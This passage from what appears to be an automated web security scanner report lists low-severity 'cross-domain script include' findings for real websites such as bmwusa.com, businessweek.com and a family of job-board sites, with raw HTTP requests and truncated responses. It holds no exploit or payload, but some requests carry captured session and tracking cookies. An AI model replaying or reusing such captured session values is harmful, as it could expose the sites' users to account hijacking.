Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 22:08:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3660;expires=Fri, 21-Jan-11 22:28:55 GMT;path=/
Content-Length: 202217


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="http://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.297. https://www.bmwusa.com/Secured/Content/Forms/Login.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bmwusa.com
Path:   /Secured/Content/Forms/Login.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Secured/Content/Forms/Login.aspx HTTP/1.1
Host: www.bmwusa.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: VisitorID=89326a93-bb02-4e80-bf57-0d5590e90613; s_pers=%20s_nr%3D1295637746935%7C1298229746935%3B; CHECK=XP9y6GTRm#@U; s_sess=%20s_cc%3Dtrue%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B; WK9733P=XyopNB6dCmvhTtil4cH2Vkfz3+2J/NQzvlMcUeiRYdZ8fjqtXBX7x/hZek/hEeoq; ddretarg=1; LK9H33C=LlItWTMXQYRZ6JknOkmjsTsNIlsgCk0BLOhnWkMKF/53WxmfXzUi2xu4wvcNH4wu; ASP.NET_SessionId=tukd5w45cqvbxc45facmuxeq; NSC_CNX_21529_64.29.204.16=4f52b42b3660; mbox=check#true#1295637806|session#1295637745501-300919#1295639606|PC#1295637745501-300919.17#1296847349;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Pragma: no-cache
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 21 Jan 2011 19:51:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_CNX_21529_64.29.204.16=4f52b42b3661;expires=Fri, 21-Jan-11 20:11:48 GMT;path=/
Content-Length: 212811


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="c
...[SNIP]...
</script>
<script src="https://com-bmwusa.netmng.com/" type="text/javascript" language="javascript"></script>
...[SNIP]...

15.298. http://www.businessanalystcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.businessanalystcrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.businessanalystcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:41 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=kldqa0cqamr0mp6anoh752e7o2; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:41 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 124047

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...
<!-- Start Quantcast tag -->
       <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

15.299. http://www.businessdevelopmentcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.businessdevelopmentcrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.businessdevelopmentcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:41 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ru1216s8gi6hento64jtdlqce3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:41 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:41 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 116452

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...
<!-- Start Quantcast tag -->
       <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

15.300. http://www.businessweek.com/news/2011-01-20/merrill-lynch-jm-said-to-be-hired-for-power-finance-share-sale.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.businessweek.com
Path:   /news/2011-01-20/merrill-lynch-jm-said-to-be-hired-for-power-finance-share-sale.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/2011-01-20/merrill-lynch-jm-said-to-be-hired-for-power-finance-share-sale.html HTTP/1.1
Host: www.businessweek.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8e-fips-rhel5
Content-Language: en
X-Powered-By: Servlet/2.4 JSP/2.0
benv: nybweb04
bvh: www.businessweek.com
Content-Type: text/html; charset=UTF-8
Date: Fri, 21 Jan 2011 18:30:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 56755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <meta conten
...[SNIP]...
</script>
<script type="text/javascript" src="http://businessweek.checkm8.com/adam/cm8adam_1_call.js"></script>
...[SNIP]...
</h2>
           <script type="text/javascript" src="http://jlinks.industrybrains.com/jsct?sid=046&amp;ct=BUSINESSWEEK_HOMEPAGE_AND_ROS&amp;tr=ROS&amp;num=5&amp;layt=1&amp;fmt=simp"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

15.301. http://www.callcentercrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.callcentercrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.callcentercrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:44 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=prr05v672vhpd9l46bt5lu88r3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:44 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:44 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:44 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:44 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:44 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:44 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:44 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:44 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 128551

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.302. http://www.chefcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.chefcrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.chefcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:46 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ha4et9frtsniged97g2n86qvf0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:46 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:46 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:46 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:46 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:46 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:46 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:46 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:46 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 108888

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.303. http://www.civilengineeringcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.civilengineeringcrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.civilengineeringcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:23:59 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=soga8db6spril7hls6mrahaid5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:23:59 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:23:59 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:23:59 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:23:59 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:23:59 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:23:59 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:23:59 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:23:59 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 106801

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.304. http://www.clevelcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.clevelcrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.clevelcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:10 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=7grpnh4ane7h6vq7m94a09osd0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:10 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:10 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:10 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:10 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:10 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:10 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:10 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:10 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 115509

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.305. http://www.clinicalresearchcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.clinicalresearchcrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.clinicalresearchcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:18 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=pot86ho5ls3u8ap2dd0c7javd7; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:18 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:18 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:18 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:18 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:18 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:18 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:18 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:18 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 101472

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.306. http://www.codylindley.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.codylindley.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.codylindley.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:39:57 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/4.4.9
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 7535

<!DOCTYPE html>
<html>
<head>
<link href="/screen.css" rel="stylesheet" media="all" />
<meta http-equiv="Content-type" content="text/html; charset=utf-8" />
<meta name="author" content="Cody Lindley
...[SNIP]...
</script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

15.307. http://www.compliancecrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.compliancecrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.compliancecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:24:20 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=t20irb9usa5ru4jlcuufdl43b5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:24:20 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:24:20 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:24:20 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:24:20 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:24:20 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:24:20 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:24:20 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:24:20 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 135192

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
